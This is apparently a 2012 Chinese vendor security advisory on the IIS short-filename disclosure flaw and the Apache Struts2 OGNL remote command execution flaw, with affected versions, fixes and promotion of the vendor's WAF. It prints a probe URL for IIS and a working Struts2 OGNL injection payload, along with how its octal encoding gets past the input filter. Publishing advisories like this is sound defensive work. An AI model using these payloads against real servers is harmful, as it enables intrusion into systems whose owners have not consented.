近期，安恒信息专家发布了7月2个安全漏洞。分别是7月2日网上公开的iis短文件名泄露漏洞与Apache Struts2远程命令执行漏洞。

　　一、iis短文件名泄露漏洞对用户的危害性中等，但影响范围较广，几乎所有版本的IIS均会直接受到影响，安恒信息专家希望引起网站管理员足够的重视，并强烈建议网站管理员检查是否受此漏洞影响并及时修补。避免不必要的财产损失。

　　我们先来了解一下iis，(英语：Internet Information Services,简称IIS)，是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。最初是Windows NT版本的可选包，随后内建在Windows 2000、Windows XP Professional和Windows Server 2003一起发行，但在普遍使用的Windows XP Home版本上并没有IIS。(维基百科)

　　下面是该漏洞的详细信息：

• 　　 漏洞类型

　　信息泄露

• 　　 2、发布时间

　　2012-07-02

• 　　 3、漏洞危害

　　中等

• 　　 4、影响范围(几乎所有IIS版本)

　　IIS 1.0, Windows NT 3.51

　　IIS 2.0, Windows NT 4.0

　　IIS 3.0, Windows NT 4.0 Service Pack 2

　　IIS 4.0, Windows NT 4.0 Option Pack

　　IIS 5.0, Windows 2000

　　IIS 5.1, Windows XP Professional and Windows XP Media Center Edition

　　IIS 6.0, Windows Server 2003 and Windows XP Professional x64 Edition

　　IIS 7.0, Windows Server 2008 and Windows Vista

　　IIS 7.5, Windows 7 (error remotely enabled or no web.config)

　　IIS 7.5, Windows 2008 (classic pipeline mode)

• 　　 5、漏洞描述

　　windows下通过~表示短文件名，如：test~1， 在IIs中可通过短我文件名的方式判断目标文件是否存在，从而降低文件名暴力猜解的难度。

• 　　 6、漏洞检查方式

　　可使用

　　http://test/%2Fconnec~1.as*%2Fx.aspx 如果存在connec开头的asp,aspx等类似文件，将返回文件不存在的错误，否则将返回非法请求。

• 　　 7、防护建议

　　目前没有官方补丁，建议使用安恒信息waf进行有效防护。

　　二、Apache Struts2导致大量使用此框架的网站沦陷，Apache Struts2 框架是在2010年7月14日被发现存在一个严重命令执行漏洞，但随之出现了防范技术，最近随着struts2带回显功能的POC被公布，出现大量的利用工具，并导致大量使用此框架的网站沦陷，并呈扩散趋势。

　　我们先来了解一下Apache Struts2，Struts2是在struts 和WebWork的技术基础上进行了合并后的全新框架。其全新的Struts 2的体系结构与Struts 1的体系结构的差别巨大。Struts 2以WebWork为核心，采用拦截器的机制来处理用户的请求，这样的设计也使得业务逻辑控制器能够与Servlet API完全脱离开，所以Struts 2可以理解为WebWork的更新产品.

　　2010年期间Struts2爆发了一远程命令执行漏洞,曾经各种版本的漏洞利用工具让CNVD郁闷不已.

• 　　 漏洞细节

　　以POST的方式提交绕过对输入参数的部分过滤。

　　?('\43_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(d))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(asdf)(('\43rp\75@org.apache.struts2.ServletActionContext@getResponse()')(c))&(fgd)(('\43rp.getWriter().print("dbappsecurity")')(d)) (grgr)(('\43rp.getWriter().close()')(d))=1

　　\75 (=的8进制)\40(空格的8进制)ongl语句中执行的参数不允许出现空格。当然包括其他老版本的正则 是^#=:都不允许，通杀的话是用\40来替代。

　　这样上面就是

　　1.设置上下文denyMethodExecution=false 运行方法执行

　　2.excludeProperties=@java.util.Collections@EMPTY_SET (@class@调用静态变量)

　　设置外部拦截器为空

　　3.myout=org.apache.struts2.ServletActionContext@getResponse() ;得到repsonse的数据

　　4.myout.getWriter().println("dbappsecurity") ;把response的数据打印到屏幕上。

• 　　 二.Struts2漏洞目前受到影响的系统包括：

　　OpenSymphony XWork < 2.2.0

　　Apache Group Struts < 2.2.0

• 　　 三.Struts2漏洞修复方案：

　　下载最新的版本2.3.4：http://struts.apache.org/download.cgi#struts234

　　或者修改对应jar中的ongl处理逻辑,然后编译打包替换旧的文件。

　　可使用安恒信息扫描器检测漏洞，运用安恒信息waf防护漏洞，安全点就只保留字母数字，其它的全部删除即可。

　　安恒信息作为中国国家信息安全漏洞库的成员单位(http://www.cnnvd.org.cn/coopration/cooprationorg/p/2/)以及良好的技术支持团队，是业界领先的应用安全及数据库安全整体解决方案提供商，专注于应用安全前沿趋势的研究和分析。其中安恒信息的“Web应用防火墙”是结合多年应用安全的攻防理论和应急响应实践经验积累的基础上自主研发完成，满足各类法律法规如PCI、等级保护、企业内部控制规范等要求，以国内创新的全透明直连部署模式，全面支持HTTPS，在提供WEB应用实时深度防御的同时实现WEB应用加速、敏感信息泄露防护及网页防篡改，为Web应用提供全方位的防护解决方案。该产品致力于解决应用及业务逻辑层面的安全问题，广泛适用于“金融、运营商、政府、公安、教育、能源、税务、工商、社保、卫生、电子商务”等所有涉及WEB应用的各个行业。部署安恒的WAF产品，可以帮助用户解决目前所面临的各类网站安全问题，如：注入攻击、跨站脚本攻击(钓鱼攻击)、恶意编码(网页木马)、缓冲区溢出、信息泄露、应用层DOS/DDOS攻击等等。